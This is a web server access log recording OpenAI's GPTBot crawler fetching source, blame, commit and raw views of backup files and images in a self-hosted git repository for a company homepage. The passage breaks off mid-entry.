"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13816] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" -[17/Feb/2026:14:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14991] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15934] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14330] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14594] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16944] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" -[17/Feb/2026:14:31:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" -[17/Feb/2026:14:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/metadata.json" -[17/Feb/2026:14:31:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" -[17/Feb/2026:14:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:31:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" -[17/Feb/2026:14:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:31:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:31:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:31:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" -[17/Feb/2026:14:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" -[17/Feb/2026:14:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" -[17/Feb/2026:14:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11962] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html" -[17/Feb/2026:14:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" -[17/Feb/2026:14:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" -[17/Feb/2026:14:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" -[17/Feb/2026:14:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" -[17/Feb/2026:14:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" -[17/Feb/2026:14:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/index.html" -[17/Feb/2026:14:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10887] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images" -[17/Feb/2026:14:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts?display=source" [Client 74.7.227.38] [Length 11499] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" -[17/Feb/2026:14:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" -[17/Feb/2026:14:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" -[17/Feb/2026:14:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" -[17/Feb/2026:14:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11239] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" -[17/Feb/2026:14:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/vite.config.ts" -[17/Feb/2026:14:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498866] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692380] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641824] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699424] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508490] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429968] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:32:13 +0000] - 200 200 - GET https 